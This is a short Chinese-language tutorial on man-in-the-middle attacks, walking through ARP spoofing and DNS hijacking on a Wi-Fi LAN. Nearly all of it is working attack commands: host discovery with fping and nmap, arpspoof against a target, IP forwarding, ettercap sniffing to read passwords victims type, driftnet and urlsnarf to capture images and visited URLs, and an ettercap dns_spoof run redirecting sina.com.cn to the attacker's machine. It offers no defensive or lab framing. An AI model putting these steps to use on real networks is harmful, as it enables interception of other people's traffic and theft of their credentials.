中间人攻击之dns劫持与ARP欺骗

arp欺骗

首先连接wifi，进入内网

• 1，查看内网的存活主机命令

  fping -asg 192.168.1.0/24

  也可以用nmap扫描

  nmap -T4 -A 192.168.1.0/24

  (视不同环境而定，假设这里的路由器地址为 192.168.1.1)
  也可利用其他工具查看其他主机，方法有很多

• 2，arp欺骗
  命令

  arpspoof -i wlan0 -t 192.168.1.2(目标的内网地址) 192.168.1.1

  上面一句就对192.168.1.2实施了欺骗 ，此时该主机是断网的

• 3，流量转发 我们将劫持到的流量通过自己发机器转发到受害人的机器上，让其恢复网络

转发命令

echo 1 >/proc/sys/net/ipv4/ip_forward   将参数换为1

这时可以启用 wireshark 抓包工具进行抓包
或者直接获取流量包

ettercap -Tq -i wlan0

这样被人输入密码后，我们就可以直接看到。
获取图片和浏览的网站

driftnet -i wlan0
urlsnarf -i wlan0

dns劫持

修改/etc/ettercap/etter.dns 添加自己的ip和劫持域名

开始进行DNS欺骗攻击：

ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /192.168.127.211// /192.168.127.2//

进行DNS 欺骗后，再次测试：ping www.sina.com.cn ，发现将www.sina.com.cn 解析指向了攻击者主机（192.168.127.208）